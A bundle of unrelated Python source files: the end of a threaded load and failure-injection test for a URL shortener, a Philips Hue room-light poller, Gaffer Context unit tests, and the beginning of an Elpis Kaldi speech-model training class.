request = "curl -X PUT 'http://{}:{}/?short={}&long={}'".format(mainProxyHost, str(mainProxyPort), shortList[int(i)], longResource)
subprocess.call(request, shell=True)
i += 1
def threadedPutTest(threads):
format = "%(asctime)s: %(message)s"
logging.basicConfig(format=format, level=logging.INFO, datefmt="%H:%M:%S")
threadsList = []
requestsPerThread = len(shortList)/ threads
i = 0
while i < len(shortList):
start = i
end = i + requestsPerThread
print("start " + str(start) + " end " + str(end))
t = threading.Thread(target=thread_function_Put, args=[start, end])
threadsList.append(t)
i += requestsPerThread
start = datetime.datetime.now()
for t in threadsList:
t.start()
for t in threadsList:
t.join()
end = datetime.datetime.now()
logging.info("Total taken %d", getMillSeconds(start,end))
# ------ Threaded Get Test -------------
def thread_function_Get(start, end):
i = start
while i < end:
url = "http://" + mainProxyHost + ":" + str(mainProxyPort) + "/" + shortList[int(i)]
request = "curl -X GET 'http://{}:{}/{}'".format(mainProxyHost, str(mainProxyPort), shortList[int(i)])
requests.get(url)
#subprocess.call(request, shell=True)
i += 1
def insertShortList(longR, index):
url = "http://" + mainProxyHost + ":" + str(mainProxyPort) + "/" + "?short=" + shortList[int(index)] + "&long=" + longR
request = ['curl', '-X', 'PUT', url]
subprocess.run(request, stdout="/dev/null")
def threadedGetTest(threads):
format = "%(asctime)s: %(message)s"
logging.basicConfig(format=format, level=logging.INFO, datefmt="%H:%M:%S")
threadsList = []
requestsPerThread = len(shortList)/ threads
i = 0
while i < len(shortList):
start = i
end = i + requestsPerThread
t = threading.Thread(target=thread_function_Get, args=[start, end])
threadsList.append(t)
i += requestsPerThread
start = datetime.datetime.now()
for t in threadsList:
t.start()
for t in threadsList:
t.join()
end = datetime.datetime.now()
logging.info("Total taken %d", getMillSeconds(start, end))
# ------ Threaded Mixed Test ----------
allRequests = []
def threadMixTest(start, end):
i = start
while i < end:
subprocess.run(allRequests[i], stdout="/dev/null")
i += 1
def threadedMixTest(threads):
format = "%(asctime)s: %(message)s"
logging.basicConfig(format=format, level=logging.INFO, datefmt="%H:%M:%S")
threadsList = []
requestsPerThread = len(allRequests)/ threads
i = 0
while i < len(allRequests):
start = i
end = i + requestsPerThread
t = threading.Thread(target=threadMixTest, args=[start, end])
threadsList.append(t)
i += requestsPerThread
start = datetime.datetime.now()
for t in threadsList:
t.start()
for t in threadsList:
t.join()
end = datetime.datetime.now()
totalTime = getMillSeconds(start, end)
througPut = (end - start) / (end - start).total_seconds()
logging.info("throughPut: %f, time(MS): %d", start, end, througPut, totalTime)
# ------------------ Avalability/Faliure Tests ------------
def urlFailureTest():
with open('../config.properties') as f:
file_content = '[config]\n' + f.read()
config = configparser.RawConfigParser()
config.read_string(file_content)
urlHosts = config.get('config', 'url.hostsAndPorts').split(',')
urlProxyHost = config.get('config', 'proxy.url.host')
urlProxyPort = config.get('config', 'proxy.url.port')
request = ['curl', 'http://' + urlProxyHost + ":" + urlProxyPort + '/hello']
subprocess.run(request)
p = Popen(['echo', "$?"], stdin=PIPE, stdout=PIPE, stderr=PIPE)
output, err = p.communicate(b"input data that is passed to subprocess' stdin")
if output == 0:
logging.info("First Request is successful")
logging.info("Killing the second URLServer at %s", urlHosts[1])
targetURLHost = urlHosts[1].split(':')[0]
targetURLPort = urlHosts[1].split(':')[1]
subprocess.run(['ssh', targetURLHost, 'fuser -k' + targetURLPort + '/tcp'])
subprocess.run(request)
p = Popen(['echo', "$?"], stdin=PIPE, stdout=PIPE, stderr=PIPE)
output, err = p.communicate(b"input data that is passed to subprocess' stdin")
if output == 0:
logging.info("First Request is successful")
def dbFailureTest():
with open('../config.properties') as f:
file_content = '[config]\n' + f.read()
config = configparser.RawConfigParser()
config.read_string(file_content)
urlProxyHost = config.get('config', 'proxy.url.host')
urlProxyPort = config.get('config', 'proxy.url.port')
dbhosts = config.get('config', 'db.hostsAndPorts').split(',')
request = ['curl', 'http://' + urlProxyHost + ":" + urlProxyPort + '/hello']
subprocess.run(request)
p = Popen(['echo', "$?"], stdin=PIPE, stdout=PIPE, stderr=PIPE)
output, err = p.communicate(b"input data that is passed to subprocess' stdin")
if output == 0:
logging.info("First Request is successful")
logging.info("Killing the second DBServer at %s", dbhosts[1])
targetDBHost = dbhosts[1].split(':')[0]
targetDBPort = dbhosts[1].split(':')[1]
subprocess.run(['ssh', targetDBHost, 'fuser -k' + targetDBPort + '/tcp'])
logging.info("Running request again")
subprocess.run(request)
p = Popen(['echo', "$?"], stdin=PIPE, stdout=PIPE, stderr=PIPE)
output, err = p.communicate(b"input data that is passed to subprocess' stdin")
if output == 0:
logging.info("First Request is successful")
if __name__ == "__main__":
generateShorts(3000,4000,1000)
#singlePutRequestTest()
#singleGetRequestTest()
#stressPutRequest()
#stressGetRequest()
#threadedPutTest(12)
threadedGetTest(5)
|
RoomLightOn.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = "MPZinke"
##########################################################################################
#
# created by: MPZinke
# on 2020.04.05
#
# DESCRIPTION:
# BUGS:
# FUTURE: - Expand such that each light is its own object
#
##########################################################################################
from datetime import datetime, timedelta
from requests import get
from time import sleep
from threading import Thread
from Definitions import *
class HueRoom:
def __init__(self, lights, wait=300):
self.lights = lights
self.any_light_is_on = False
self.has_not_ended = True
self.sleep_until_time = datetime.now()
self.thread = Thread(target=self.thread_loop)
self.wait = wait
def end(self):
self.has_not_ended = False
def sleep(self, sleep_until_time):
if type(sleep_until_time) == int():
self.sleep_until_time = datetime.now() + timedelta(seconds=sleep_until_time)
elif type(sleep_until_time) == type(self.sleep_until_time):
self.sleep_until_time = sleep_until_time
def start(self):
self.thread.start()
def thread_loop(self):
while self.has_not_ended:
while datetime.now() < self.sleep_until_time: sleep(30)
try:
request_json = self.request()
self.decode_request(request_json)
except Exception as error:
print(error)
self.decode_request()
sleep(self.wait)
def check_connection(self):
url = "http://%s/api/%s/lights" % (BRIDGE_IP_ADDRESS, USER_NAME)
request = get(url=url).json()
return request
def check_if_any_light_is_on(self):
for light in self.lights:
if self.light_is_on(light): return True
return False
def light_is_on(self, light):
url = "http://%s/api/%s/lights/%d" % (BRIDGE_IP_ADDRESS, USER_NAME, light)
request = get(url=url).json()
if "state" in request and request["state"]["reachable"] and request["state"]["on"]:
return True
return False
|
ContextTest.py
|
##########################################################################
#
# Copyright (c) 2012, John Haddon. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import threading
import weakref
import imath
import IECore
import Gaffer
import GafferTest
class ContextTest( GafferTest.TestCase ) :
def testFrameAccess( self ) :
c = Gaffer.Context()
self.assertEqual( c.getFrame(), 1.0 )
self.assertEqual( c["frame"], 1.0 )
c.setFrame( 10.5 )
self.assertEqual( c.getFrame(), 10.5 )
self.assertEqual( c["frame"], 10.5 )
def testChangedSignal( self ) :
c = Gaffer.Context()
changes = []
def f( context, name ) :
self.failUnless( context.isSame( c ) )
changes.append( ( name, context.get( name, None ) ) )
cn = c.changedSignal().connect( f )
c["a"] = 2
self.assertEqual( changes, [ ( "a", 2 ) ] )
c["a"] = 3
self.assertEqual( changes, [ ( "a", 2 ), ( "a", 3 ) ] )
c["b"] = 1
self.assertEqual( changes, [ ( "a", 2 ), ( "a", 3 ), ( "b", 1 ) ] )
# when an assignment makes no actual change, the signal should not
# be triggered again.
c["b"] = 1
self.assertEqual( changes, [ ( "a", 2 ), ( "a", 3 ), ( "b", 1 ) ] )
# Removing variables should also trigger the changed signal.
del changes[:]
c.remove( "a" )
self.assertEqual( changes, [ ( "a", None ) ] )
del c["b"]
self.assertEqual( changes, [ ( "a", None ), ( "b", None ) ] )
def testTypes( self ) :
c = Gaffer.Context()
c["int"] = 1
self.assertEqual( c["int"], 1 )
self.assertEqual( c.get( "int" ), 1 )
c.set( "int", 2 )
self.assertEqual( c["int"], 2 )
self.failUnless( isinstance( c["int"], int ) )
c["float"] = 1.0
self.assertEqual( c["float"], 1.0 )
self.assertEqual( c.get( "float" ), 1.0 )
c.set( "float", 2.0 )
self.assertEqual( c["float"], 2.0 )
self.failUnless( isinstance( c["float"], float ) )
c["string"] = "hi"
self.assertEqual( c["string"], "hi" )
self.assertEqual( c.get( "string" ), "hi" )
c.set( "string", "bye" )
self.assertEqual( c["string"], "bye" )
self.failUnless( isinstance( c["string"], basestring ) )
c["v2i"] = imath.V2i( 1, 2 )
self.assertEqual( c["v2i"], imath.V2i( 1, 2 ) )
self.assertEqual( c.get( "v2i" ), imath.V2i( 1, 2 ) )
c.set( "v2i", imath.V2i( 1, 2 ) )
self.assertEqual( c["v2i"], imath.V2i( 1, 2 ) )
self.failUnless( isinstance( c["v2i"], imath.V2i ) )
c["v3i"] = imath.V3i( 1, 2, 3 )
self.assertEqual( c["v3i"], imath.V3i( 1, 2, 3 ) )
self.assertEqual( c.get( "v3i" ), imath.V3i( 1, 2, 3 ) )
c.set( "v3i", imath.V3i( 1, 2, 3 ) )
self.assertEqual( c["v3i"], imath.V3i( 1, 2, 3 ) )
self.failUnless( isinstance( c["v3i"], imath.V3i ) )
c["v2f"] = imath.V2f( 1, 2 )
self.assertEqual( c["v2f"], imath.V2f( 1, 2 ) )
self.assertEqual( c.get( "v2f" ), imath.V2f( 1, 2 ) )
c.set( "v2f", imath.V2f( 1, 2 ) )
self.assertEqual( c["v2f"], imath.V2f( 1, 2 ) )
self.failUnless( isinstance( c["v2f"], imath.V2f ) )
c["v3f"] = imath.V3f( 1, 2, 3 )
self.assertEqual( c["v3f"], imath.V3f( 1, 2, 3 ) )
self.assertEqual( c.get( "v3f" ), imath.V3f( 1, 2, 3 ) )
c.set( "v3f", imath.V3f( 1, 2, 3 ) )
self.assertEqual( c["v3f"], imath.V3f( 1, 2, 3 ) )
self.failUnless( isinstance( c["v3f"], imath.V3f ) )
def testCopying( self ) :
c = Gaffer.Context()
c["i"] = 10
c2 = Gaffer.Context( c )
self.assertEqual( c2["i"], 10 )
c["i"] = 1
self.assertEqual( c["i"], 1 )
self.assertEqual( c2["i"], 10 )
def testEquality( self ) :
c = Gaffer.Context()
c2 = Gaffer.Context()
self.assertEqual( c, c2 )
self.failIf( c != c2 )
c["somethingElse"] = 1
self.assertNotEqual( c, c2 )
self.failIf( c == c2 )
def testCurrent( self ) :
# if nothing has been made current then there should be a default
# constructed context in place.
c = Gaffer.Context.current()
c2 = Gaffer.Context()
self.assertEqual( c, c2 )
# and we should be able to change that using the with statement
c2["something"] = 1
with c2 :
self.failUnless( Gaffer.Context.current().isSame( c2 ) )
self.assertEqual( Gaffer.Context.current()["something"], 1 )
# and bounce back to the original
self.failUnless( Gaffer.Context.current().isSame( c ) )
def testCurrentIsThreadSpecific( self ) :
c = Gaffer.Context()
self.failIf( c.isSame( Gaffer.Context.current() ) )
def f() :
self.failIf( c.isSame( Gaffer.Context.current() ) )
with Gaffer.Context() :
pass
with c :
self.failUnless( c.isSame( Gaffer.Context.current() ) )
t = threading.Thread( target = f )
t.start()
t.join()
self.failUnless( c.isSame( Gaffer.Context.current() ) )
self.failIf( c.isSame( Gaffer.Context.current() ) )
def testThreading( self ) :
# for good measure, run testCurrent() in a load of threads at
# the same time.
threads = []
for i in range( 0, 1000 ) :
t = threading.Thread( target = self.testCurrent )
t.start()
threads.append( t )
for t in threads :
t.join()
def testSetWithObject( self ) :
c = Gaffer.Context()
v = IECore.StringVectorData( [ "a", "b", "c" ] )
c.set( "v", v )
self.assertEqual( c.get( "v" ), v )
self.failIf( c.get( "v" ).isSame( v ) )
self.assertEqual( c["v"], v )
self.failIf( c["v"].isSame( v ) )
def testGetWithDefault( self ) :
c = Gaffer.Context()
self.assertRaises( RuntimeError, c.get, "f" )
self.assertEqual( c.get( "f", 10 ), 10 )
c["f"] = 1.0
self.assertEqual( c.get( "f" ), 1.0 )
def testReentrancy( self ) :
c = Gaffer.Context()
with c :
self.failUnless( c.isSame( Gaffer.Context.current() ) )
with c :
self.failUnless( c.isSame( Gaffer.Context.current() ) )
def testLifeTime( self ) :
c = Gaffer.Context()
w = weakref.ref( c )
self.failUnless( w() is c )
with c :
pass
del c
self.failUnless( w() is None )
def testWithBlockReturnValue( self ) :
with Gaffer.Context() as c :
self.failUnless( isinstance( c, Gaffer.Context ) )
self.failUnless( c.isSame( Gaffer.Context.current() ) )
def testSubstitute( self ) :
c = Gaffer.Context()
c.setFrame( 20 )
c["a"] = "apple"
c["b"] = "bear"
self.assertEqual( c.substitute( "$a/$b/something.###.tif" ), "apple/bear/something.020.tif" )
self.assertEqual( c.substitute( "$a/$dontExist/something.###.tif" ), "apple//something.020.tif" )
self.assertEqual( c.substitute( "${badlyFormed" ), "" )
def testSubstituteTildeInMiddle( self ) :
c = Gaffer.Context()
self.assertEqual( c.substitute( "a~b" ), "a~b" )
def testSubstituteWithMask( self ) :
c = Gaffer.Context()
c.setFrame( 20 )
c["a"] = "apple"
c["b"] = "bear"
self.assertEqual( c.substitute( "~", c.Substitutions.AllSubstitutions & ~c.Substitutions.TildeSubstitutions ), "~" )
self.assertEqual( c.substitute( "#", c.Substitutions.AllSubstitutions & ~c.Substitutions.FrameSubstitutions ), "#" )
self.assertEqual( c.substitute( "$a/${b}", c.Substitutions.AllSubstitutions & ~c.Substitutions.VariableSubstitutions ), "$a/${b}" )
self.assertEqual( c.substitute( "\\", c.Substitutions.AllSubstitutions & ~c.Substitutions.EscapeSubstitutions ), "\\" )
self.assertEqual( c.substitute( "\\$a", c.Substitutions.AllSubstitutions & ~c.Substitutions.EscapeSubstitutions ), "\\apple" )
self.assertEqual( c.substitute( "#${a}", c.Substitutions.AllSubstitutions & ~c.Substitutions.FrameSubstitutions ), "#apple" )
self.assertEqual( c.substitute( "#${a}", c.Substitutions.NoSubstitutions ), "#${a}" )
def testFrameAndVariableSubstitutionsAreDifferent( self ) :
c = Gaffer.Context()
c.setFrame( 3 )
# Turning off variable substitutions should have no effect on '#' substitutions.
self.assertEqual( c.substitute( "###.$frame" ), "003.3" )
self.assertEqual( c.substitute( "###.$frame", c.Substitutions.AllSubstitutions & ~c.Substitutions.VariableSubstitutions ), "003.$frame" )
# Turning off '#' substitutions should have no effect on variable substitutions.
self.assertEqual( c.substitute( "###.$frame" ), "003.3" )
self.assertEqual( c.substitute( "###.$frame", c.Substitutions.AllSubstitutions & ~c.Substitutions.FrameSubstitutions ), "###.3" )
def testSubstitutions( self ) :
c = Gaffer.Context
self.assertEqual( c.substitutions( "a"), c.Substitutions.NoSubstitutions )
self.assertEqual( c.substitutions( "~/something"), c.Substitutions.TildeSubstitutions )
self.assertEqual( c.substitutions( "$a"), c.Substitutions.VariableSubstitutions )
self.assertEqual( c.substitutions( "${a}"), c.Substitutions.VariableSubstitutions )
self.assertEqual( c.substitutions( "###"), c.Substitutions.FrameSubstitutions )
self.assertEqual( c.substitutions( "\#"), c.Substitutions.EscapeSubstitutions )
self.assertEqual( c.substitutions( "${a}.###"), c.Substitutions.VariableSubstitutions | c.Substitutions.FrameSubstitutions )
def testHasSubstitutions( self ) :
c = Gaffer.Context()
self.assertFalse( c.hasSubstitutions( "a" ) )
self.assertTrue( c.hasSubstitutions( "~something" ) )
self.assertTrue( c.hasSubstitutions( "$a" ) )
self.assertTrue( c.hasSubstitutions( "${a}" ) )
self.assertTrue( c.hasSubstitutions( "###" ) )
def testNames( self ) :
c = Gaffer.Context()
self.assertEqual( set( c.names() ), set( [ "frame", "framesPerSecond" ] ) )
c["a"] = 10
self.assertEqual( set( c.names() ), set( [ "frame", "framesPerSecond", "a" ] ) )
cc = Gaffer.Context( c )
self.assertEqual( set( cc.names() ), set( [ "frame", "framesPerSecond", "a" ] ) )
cc["b"] = 20
self.assertEqual( set( cc.names() ), set( [ "frame", "framesPerSecond", "a", "b" ] ) )
self.assertEqual( set( c.names() ), set( [ "frame", "framesPerSecond", "a" ] ) )
self.assertEqual( cc.names(), cc.keys() )
def testManyContexts( self ) :
GafferTest.testManyContexts()
def testGetWithAndWithoutCopying( self ) :
c = Gaffer.Context()
c["test"] = IECore.IntVectorData( [ 1, 2 ] )
# we should be getting a copy each time by default
self.assertFalse( c["test"].isSame( c["test"] ) )
# meaning that if we modify the returned value, no harm is done
c["test"].append( 10 )
self.assertEqual( c["test"], IECore.IntVectorData( [ 1, 2 ] ) )
# if we ask nicely, we can get a reference to the internal
# value without any copying.
self.assertTrue( c.get( "test", _copy=False ).isSame( c.get( "test", _copy=False ) ) )
# but then if we modify the returned value, we are changing the
# context itself too. this should be avoided - we're just doing it
# here to test that we are indeed referencing the internal value.
c.get( "test", _copy=False ).append( 10 )
self.assertEqual( c["test"], IECore.IntVectorData( [ 1, 2, 10 ] ) )
def testGetWithDefaultAndCopyArgs( self ) :
c = Gaffer.Context()
c["test"] = IECore.IntVectorData( [ 1, 2 ] )
self.assertTrue( c.get( "test", 10, _copy=False ).isSame( c.get( "test", 20, _copy=False ) ) )
self.assertTrue( c.get( "test", defaultValue=10, _copy=False ).isSame( c.get( "test", defaultValue=20, _copy=False ) ) )
def testCopyWithSharedOwnership( self ) :
c1 = Gaffer.Context()
c1["testInt"] = 10
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
self.assertEqual( c1["testInt"], 10 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
r = c1.get( "testIntVector", _copy=False ).refCount()
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Shared )
self.assertEqual( c2["testInt"], 10 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
c1["testInt"] = 20
self.assertEqual( c1["testInt"], 20 )
# c2 has changed too! with slightly improved performance comes
# great responsibility!
self.assertEqual( c2["testInt"], 20 )
# both contexts reference the same object, but c2 at least owns
# a reference to its values, and can be used after c1 has been
# deleted.
self.assertTrue( c2.get( "testIntVector", _copy=False ).isSame( c1.get( "testIntVector", _copy=False ) ) )
self.assertEqual( c2.get( "testIntVector", _copy=False ).refCount(), r + 1 )
del c1
self.assertEqual( c2["testInt"], 20 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
self.assertEqual( c2.get( "testIntVector", _copy=False ).refCount(), r )
def testCopyWithBorrowedOwnership( self ) :
c1 = Gaffer.Context()
c1["testInt"] = 10
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
self.assertEqual( c1["testInt"], 10 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
r = c1.get( "testIntVector", _copy=False ).refCount()
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Borrowed )
self.assertEqual( c2["testInt"], 10 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
c1["testInt"] = 20
self.assertEqual( c1["testInt"], 20 )
# c2 has changed too! with slightly improved performance comes
# great responsibility!
self.assertEqual( c2["testInt"], 20 )
# check that c2 doesn't own a reference
self.assertTrue( c2.get( "testIntVector", _copy=False ).isSame( c1.get( "testIntVector", _copy=False ) ) )
self.assertEqual( c2.get( "testIntVector", _copy=False ).refCount(), r )
# make sure we delete c2 before we delete c1
del c2
# check that we're ok to access c1 after deleting c2
self.assertEqual( c1["testInt"], 20 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
def testSetOnBorrowedContextsDoesntAffectOriginal( self ) :
c1 = Gaffer.Context()
c1["testInt"] = 10
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Borrowed )
c2["testInt"] = 20
c2["testIntVector"] = IECore.IntVectorData( [ 20 ] )
self.assertEqual( c1["testInt"], 10 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
self.assertEqual( c2["testInt"], 20 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 20 ] ) )
def testSetOnSharedContextsDoesntAffectOriginal( self ) :
c1 = Gaffer.Context()
c1["testInt"] = 10
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Shared )
c2["testInt"] = 20
c2["testIntVector"] = IECore.IntVectorData( [ 20 ] )
self.assertEqual( c1["testInt"], 10 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
self.assertEqual( c2["testInt"], 20 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 20 ] ) )
def testSetOnSharedContextsReleasesReference( self ) :
c1 = Gaffer.Context()
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
r = c1.get( "testIntVector", _copy=False ).refCount()
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Shared )
c2["testIntVector"] = IECore.IntVectorData( [ 20 ] )
self.assertEqual( c1.get( "testIntVector", _copy=False ).refCount(), r )
def testHash( self ) :
c = Gaffer.Context()
hashes = [ c.hash() ]
c["test"] = 1
hashes.append( c.hash() )
c["test"] = 2
hashes.append( c.hash() )
c["test2"] = "test2"
hashes.append( c.hash() )
self.assertEqual( len( hashes ), 4 )
self.assertEqual( len( set( str( h ) for h in hashes ) ), len( hashes ) )
c["test2"] = "test2" # no change
self.assertEqual( c.hash(), hashes[-1] )
def testChanged( self ) :
c = Gaffer.Context()
c["test"] = IECore.StringVectorData( [ "one" ] )
h = c.hash()
cs = GafferTest.CapturingSlot( c.changedSignal() )
d = c.get( "test", _copy = False ) # dangerous! the context won't know if we make changes
d.append( "two" )
self.assertEqual( c.get( "test" ), IECore.StringVectorData( [ "one", "two" ] ) )
self.assertEqual( len( cs ), 0 )
c.changed( "test" ) # let the context know what we've been up to
self.assertEqual( len( cs ), 1 )
self.assertEqual( cs[0], ( c, "test" ) )
self.assertNotEqual( c.hash(), h )
def testHashIgnoresUIEntries( self ) :
c = Gaffer.Context()
h = c.hash()
c["ui:test"] = 1
self.assertEqual( h, c.hash() )
def testManySubstitutions( self ) :
GafferTest.testManySubstitutions()
def testManyEnvironmentSubstitutions( self ) :
GafferTest.testManyEnvironmentSubstitutions()
def testEscapedSubstitutions( self ) :
c = Gaffer.Context()
c.setFrame( 20 )
c["a"] = "apple"
c["b"] = "bear"
self.assertEqual( c.substitute( "\${a}.\$b" ), "${a}.$b" )
self.assertEqual( c.substitute( "\~" ), "~" )
self.assertEqual( c.substitute( "\#\#\#\#" ), "####" )
# really we're passing \\ to substitute and getting back \ -
# the extra slashes are escaping for the python interpreter.
self.assertEqual( c.substitute( "\\\\" ), "\\" )
self.assertEqual( c.substitute( "\\" ), "" )
self.assertTrue( c.hasSubstitutions( "\\" ) ) # must return true, because escaping affects substitution
self.assertTrue( c.hasSubstitutions( "\\\\" ) ) # must return true, because escaping affects substitution
def testRemove( self ) :
c = Gaffer.Context()
c["a"] = "apple"
c["b"] = "bear"
c["c"] = "cat"
h = c.hash()
self.assertEqual( set( c.names() ), set( [ "a", "b", "c", "frame", "framesPerSecond" ] ) )
# test Context.remove()
c.remove( "a" )
self.assertNotEqual( c.hash(), h )
self.assertEqual( set( c.names() ), set( [ "b", "c", "frame", "framesPerSecond" ] ) )
h = c.hash()
# test Context.__delitem__()
del c[ "c" ]
self.assertNotEqual( c.hash(), h )
self.assertEqual( set( c.names() ), set( [ "b", "frame", "framesPerSecond" ] ) )
self.assertEqual( c["b"], "bear" )
def testRemoveMatching( self ) :
c = Gaffer.Context()
c["a_1"] = "apple"
c["a_2"] = "apple"
c["b_1"] = "bear"
c["b_2"] = "bear"
c["c_1"] = "cat"
c["c_2"] = "cat"
h = c.hash()
self.assertEqual( set( c.names() ), set( [ "a_1", "a_2", "b_1", "b_2", "c_1", "c_2", "frame", "framesPerSecond" ] ) )
# test Context.removeMatching()
c.removeMatching( "a* c*" )
self.assertNotEqual( c.hash(), h )
self.assertEqual( set( c.names() ), set( [ "b_1", "b_2", "frame", "framesPerSecond" ] ) )
h = c.hash()
def testContains( self ) :
c = Gaffer.Context()
self.assertFalse( "a" in c )
self.assertTrue( "a" not in c )
c["a"] = 1
self.assertTrue( "a" in c )
self.assertFalse( "a" not in c )
del c["a"]
self.assertFalse( "a" in c )
self.assertTrue( "a" not in c )
def testTime( self ) :
c = Gaffer.Context()
self.assertEqual( c.getFrame(), 1.0 )
self.assertEqual( c.getFramesPerSecond(), 24.0 )
self.assertAlmostEqual( c.getTime(), 1.0 / 24.0 )
c.setFrame( 12.0 )
self.assertEqual( c.getFrame(), 12.0 )
self.assertEqual( c.getFramesPerSecond(), 24.0 )
self.assertAlmostEqual( c.getTime(), 12.0 / 24.0 )
c.setFramesPerSecond( 48.0 )
self.assertEqual( c.getFrame(), 12.0 )
self.assertEqual( c.getFramesPerSecond(), 48.0 )
self.assertAlmostEqual( c.getTime(), 12.0 / 48.0 )
def testEditableScope( self ) :
GafferTest.testEditableScope()
def testCanceller( self ) :
c = Gaffer.Context()
c["test"] = 1
self.assertEqual( c.canceller(), None )
canceller = IECore.Canceller()
cc = Gaffer.Context( c, canceller )
self.assertEqual( cc["test"], 1 )
self.assertTrue( cc.canceller() is not None )
canceller.cancel()
with self.assertRaises( IECore.Cancelled ) :
IECore.Canceller.check( cc.canceller() )
if __name__ == "__main__":
unittest.main()
|
model.py
|
import os
import re
import shutil
from pathlib import Path
from typing import Callable, Dict, Tuple
import threading
from elpis.engines.common.objects.command import run
from elpis.engines.common.objects.model import Model as BaseModel
from elpis.engines.common.objects.dataset import Dataset
from elpis.engines.common.objects.pron_dict import PronDict
from elpis.engines.kaldi.input.json_to_kaldi import create_kaldi_structure
from elpis.engines.common.objects.path_structure import PathStructure
from collections import OrderedDict
from subprocess import CalledProcessError
from jinja2 import Template
class KaldiModel(BaseModel): # TODO not thread safe
# _links = {**Model._links, **{"pron_dict": PronDict}}
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.pron_dict: PronDict = None
self.config['pron_dict_name'] = None # pron_dict hash has not been linked
self.config['ngram'] = 1 # default to 1 to make playing quicker
self.config['engine_name'] = 'kaldi'
stage_names = {
"0_setup.sh": "setup",
"1_prep_acoustic.sh": "acousticPreparation",
"2_feature_ext.sh": "featureExtraction",
"3_prep_lang_data.sh": "dataPreparation",
"4_lang_model_cr.sh": "modelCreation",
"5_mono.sh": "monophoneTraining",
"6_tri1.sh": "triphoneTraining"
}
super().build_stage_status(stage_names)
@classmethod
def load(cls, base_path: Path):
self = super().load(base_path)
self.pron_dict = None
return self
def link_pron_dict(self, pron_dict: PronDict):
self.pron_dict = pron_dict
self.config['pron_dict_name'] = pron_dict.name
@property
def ngram(self) -> int:
return int(self.config['ngram'])
@ngram.setter
def ngram(self, value: int) -> None:
self.config['ngram'] = value
def build_structure(self):
# task json-to-kaldi
output_path = self.path.joinpath('output')
output_path.mkdir(parents=True, exist_ok=True)
# Copy cleaned corpus from dataset to the model
dataset_corpus_txt = self.dataset.path.joinpath('cleaned', 'corpus.txt')
model_corpus_txt = self.path.joinpath('corpus.txt')
if os.path.exists(dataset_corpus_txt):
shutil.copy(f"{dataset_corpus_txt}", f"{model_corpus_txt}")
create_kaldi_structure(
input_json=f'{self.dataset.pathto.annotation_json}',
output_folder=f'{output_path}',
silence_markers=False,
corpus_txt=f'{model_corpus_txt}'
)
def train(self, on_complete:Callable=None):
def prepare_for_training():
print("prepare_for_training")
# task make-kaldi-subfolders
kaldi_structure = PathStructure(self.path)
local_kaldi_path = self.path.joinpath('kaldi')
local_kaldi_path.mkdir(parents=True, exist_ok=True)
kaldi_data_local_dict = local_kaldi_path.joinpath('data', 'local', 'dict')
kaldi_data_local_dict.mkdir(parents=True, exist_ok=True)
kaldi_data_local = local_kaldi_path.joinpath('data', 'local')
kaldi_data_local.mkdir(parents=True, exist_ok=True)
kaldi_data_test = local_kaldi_path.joinpath('data', 'test')
kaldi_data_test.mkdir(parents=True, exist_ok=True)
kaldi_data_train = local_kaldi_path.joinpath('data', 'train')
kaldi_data_train.mkdir(parents=True, exist_ok=True)
kaldi_conf = local_kaldi_path.joinpath('conf')
kaldi_conf.mkdir(parents=True, exist_ok=True)
kaldi_local = local_kaldi_path.joinpath('local')
kaldi_local.mkdir(parents=True, exist_ok=True)
# copy the pron dict
shutil.copy(f"{self.pron_dict.lexicon_txt_path}", f"{kaldi_data_local_dict.joinpath('lexicon.txt')}")
# task generate-kaldi-configs
path_file_path = kaldi_structure.path.joinpath('path.sh')
